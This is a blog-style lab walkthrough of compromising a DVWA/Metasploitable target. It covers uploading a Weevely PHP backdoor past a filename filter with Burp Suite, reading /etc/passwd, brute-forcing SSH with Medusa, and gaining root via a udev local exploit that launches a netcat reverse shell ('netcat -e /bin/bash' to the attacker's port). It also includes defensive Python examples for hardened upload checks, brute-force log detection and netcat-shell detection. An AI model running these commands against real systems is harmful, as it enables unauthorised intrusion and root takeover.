Monday, 22 October 2012

Hacking DVWA and Getting Root

Posted at 16:18
Hello all, today I was learning about DVWA, and I wanted to hack DVWA until I got root. I'm using the upload feature at the high security level. Beforehand I prepared a PHP backdoor generated using Weevely.

# Create Backdoor with Weevely

Go to the terminal and type:
```
cd /pentest/web/backdoors/weevely
```

Create the backdoor with this command:
```
./ generate secret cobasaja.php
```
See the picture below for details.

# Upload the Backdoor and Bypass DVWA Protection with Burp Suite

Upload the backdoor created with Weevely.
You will see that the upload fails, so we bypass the check using Burp Suite.
Open Burp Suite and make sure intercept is on.

Open your browser and set its proxy to Burp Suite.
Go back to DVWA and re-upload the backdoor. Burp Suite will intercept the request so it can be tampered with.
Edit the filename by adding a .jpg extension.
Then press the Forward button.

Hooray, the backdoor uploaded successfully.
Now connect to the backdoor from our machine with this command:
```
./ secret
```
OK, now your machine is connected to the backdoor.
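The bypass above works because the server trusts the client-supplied filename. As an added example (not code from the post or from DVWA), the following Python contrasts a weak name-only check with a hardened upload handler that requires exactly one whitelisted extension, verifies the file's magic bytes against the claimed type, and stores the file under a random server-chosen name. The whitelist, magic table and sample inputs are constructed for the demo.

```python
import os
import secrets
from typing import Optional

# Extensions the gallery is willing to store (constructed whitelist for the demo).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of each allowed type, used to check that the content matches the
# claimed extension rather than trusting the name the client sent.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def weak_check(filename: str) -> bool:
    """The kind of check a tampered filename slips past: it only asks whether
    an image extension appears somewhere in the client-supplied name."""
    name = filename.lower()
    return any(f".{ext}" in name for ext in ALLOWED_EXTENSIONS)


def strict_check(filename: str, content: bytes) -> bool:
    """Hardened check: exactly one extension, it must be whitelisted, and the
    bytes must begin with the magic of the type the extension claims."""
    base = os.path.basename(filename).lower()
    if not base or base.startswith("."):
        return False
    parts = base.split(".")
    if len(parts) != 2:  # rejects name.php.jpg, name.jpg.php and names without an extension
        return False
    ext = parts[1]
    if ext not in ALLOWED_EXTENSIONS:
        return False
    return content.startswith(MAGIC[ext])


def handle_upload(filename: str, content: bytes) -> Optional[str]:
    """Returns the server-chosen name under which the file would be stored, or
    None when the upload is rejected. The random stem means the client never
    decides the stored name, and so never decides which handler serves it."""
    if not strict_check(filename, content):
        return None
    ext = os.path.basename(filename).lower().split(".")[1]
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed inputs: a genuine JPEG header and a file that is PHP, not an image.
JPEG_BYTES = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_BYTES = b"<?php /* not an image */ ?>"

if __name__ == "__main__":
    for name, data in [("photo.jpg", JPEG_BYTES),
                       ("cobasaja.php.jpg", PHP_BYTES),
                       ("cobasaja.jpg.php", PHP_BYTES),
                       ("cobasaja.jpg", PHP_BYTES)]:
        accepted = handle_upload(name, data) is not None
        print(f"{name:20} weak={weak_check(name)!s:5} strict={accepted}")
```

The stored-name step matters as much as the extension check: with a random stem and a whitelisted suffix, the stored file can never carry a name like `x.php.jpg`, so the web server's multiple-extension handling never comes into play. Storing uploads outside the document root, or serving them from a handler-free directory, closes the remaining gap.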


Now I will look for the available users on the target machine:
```
cat /etc/passwd
```

Yuhu, we got a user named msfadmin.
I will crack this user's password with Medusa:
```
medusa -h -u msfadmin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -M ssh
```
* `-h`: hostname
* `-u`: username
* `-P`: path of the wordlist
* `-e`: extra password checks; `ns` tries a blank password (`n`) and the username as the password (`s`)
* `-M`: module (here ssh)

Haha, I got the password for the username msfadmin: "msfadmin" is the password for msfadmin.
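A dictionary attack like the Medusa run above leaves a very recognizable trail in sshd's log. As an added example (not part of the post), this Python script parses constructed `auth.log` lines, keeps a sliding window of failed logins per source and user, and raises one alert when the failure threshold is reached and another when a success follows a run of failures, which is the event a responder cares about most. The log lines, hostnames and addresses are constructed; the message formats are the ones OpenSSH writes.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt: the shape sshd logs during a dictionary attack
# against one account, ending with a success, plus one unrelated key login.
SAMPLE_LOG = """\
Oct 22 16:01:01 target sshd[2301]: Failed password for msfadmin from 10.0.0.5 port 40001 ssh2
Oct 22 16:01:02 target sshd[2302]: Failed password for msfadmin from 10.0.0.5 port 40002 ssh2
Oct 22 16:01:03 target sshd[2303]: Failed password for msfadmin from 10.0.0.5 port 40003 ssh2
Oct 22 16:01:04 target sshd[2304]: Failed password for msfadmin from 10.0.0.5 port 40004 ssh2
Oct 22 16:01:05 target sshd[2305]: Failed password for msfadmin from 10.0.0.5 port 40005 ssh2
Oct 22 16:01:06 target sshd[2306]: Failed password for msfadmin from 10.0.0.5 port 40006 ssh2
Oct 22 16:01:07 target sshd[2307]: Accepted password for msfadmin from 10.0.0.5 port 40007 ssh2
Oct 22 16:05:00 target sshd[2400]: Accepted publickey for alice from 10.0.0.9 port 50000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_line(line):
    """Returns (timestamp, result, user, source) for an sshd auth line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Syslog timestamps carry no year; only the relative spacing matters here.
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Sliding-window count of failures per (source, user). Emits one alert
    when the threshold is reached inside the window and another when a
    success arrives while failures are still in the window."""
    failures = defaultdict(deque)
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        window = failures[(src, user)]
        while window and (ts - window[0]).total_seconds() > window_s:
            window.popleft()
        if result == "Failed":
            window.append(ts)
            if len(window) == threshold:
                alerts.append(f"brute-force: {threshold} failures for {user} "
                              f"from {src} within {window_s}s")
        else:
            if window:
                alerts.append(f"success-after-failures: {user} from {src} "
                              f"after {len(window)} failures")
            window.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Detection is the second line of defence; the first is making the guess impossible, which for an account whose password equals its username means enforcing a password policy or, better, `PasswordAuthentication no` in `sshd_config` so that only keys are accepted.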

What happens if the brute force fails? Then we must try a local exploit. I will use the udev local exploit for Linux. You can download the exploit here

After downloading the exploit, we need to compile it:
```
gcc 8572.c -o udev
```
Now create a script that makes the target machine connect back to our machine with netcat, using root access:
```
echo '#!/bin/bash' > /tmp/run
echo '/bin/netcat -e /bin/bash 4444' >> /tmp/run
```
* Please note that the address before the port is our (attacker) IP.

Back on our machine, make our system listen on port 4444:
```
nc -lvp 4444
```

Check the PID of udev with the following command:
```
cat /proc/net/netlink
```
You will see that the PID is 2441; we will need this PID.

Now back to our exploit: run the compiled exploit followed by the PID:
```
./udev 2441
```

Go to our netcat listener and type `id` and `whoami`; you will see that you have got root.
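The end state of this chain is easy to recognize on the host: a root-owned netcat asked to execute a shell, started from a script in `/tmp` by a system daemon. As an added example (not part of the post), this Python script parses a constructed `ps -eo pid,ppid,uid,args` snapshot and flags netcat-style processes carrying an exec flag, recording whether they run as root and whether the parent is an interpreter running a script from a scratch directory. The process listing, PIDs and addresses are constructed for the demo.

```python
import os
import shlex

# Constructed process snapshot in the layout of `ps -eo pid,ppid,uid,args`,
# showing what a /tmp/run script looks like once udevd has executed it, next
# to ordinary processes that must not be flagged.
SAMPLE_PS = """\
  PID  PPID   UID ARGS
    1     0     0 /sbin/init
 2441     1     0 /sbin/udevd --daemon
 2501  2441     0 /bin/bash /tmp/run
 2502  2501     0 /bin/netcat -e /bin/bash 10.0.0.5 4444
 2600  1800  1000 /usr/bin/python3 app.py
 2601  1800  1000 nc -z 10.0.0.7 80
"""

NETCAT_NAMES = {"nc", "netcat", "ncat"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_ps(text):
    """Maps pid -> {ppid, uid, argv} from ps output; skips the header line."""
    procs = {}
    for line in text.splitlines()[1:]:
        fields = line.split(None, 3)
        if len(fields) < 4:
            continue
        pid, ppid, uid, args = fields
        procs[int(pid)] = {"ppid": int(ppid), "uid": int(uid), "argv": shlex.split(args)}
    return procs


def find_exec_shells(procs):
    """Flags netcat-style processes asked to run a program (-e and friends),
    noting whether they run as root and whether the parent is running a
    script out of a scratch directory such as /tmp."""
    findings = []
    for pid, p in procs.items():
        argv = p["argv"]
        if not argv or os.path.basename(argv[0]) not in NETCAT_NAMES:
            continue
        if not any(a in EXEC_FLAGS for a in argv[1:]):
            continue
        parent = procs.get(p["ppid"], {"argv": []})
        script = next((a for a in parent["argv"] if a.startswith(SCRATCH_DIRS)), None)
        findings.append({
            "pid": pid,
            "as_root": p["uid"] == 0,
            "cmdline": " ".join(argv),
            "parent_script": script,
        })
    return findings


if __name__ == "__main__":
    for finding in find_exec_shells(parse_ps(SAMPLE_PS)):
        print(finding)
```

A plain port check (`nc -z`) is left alone; only the exec flags are of interest. In a real deployment the same rule belongs in an EDR or auditd policy rather than a one-shot `ps` parse, and the underlying fix is keeping udev patched so the daemon never runs a script from `/tmp` in the first place.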

©2012 SECURITY, powered by Blogger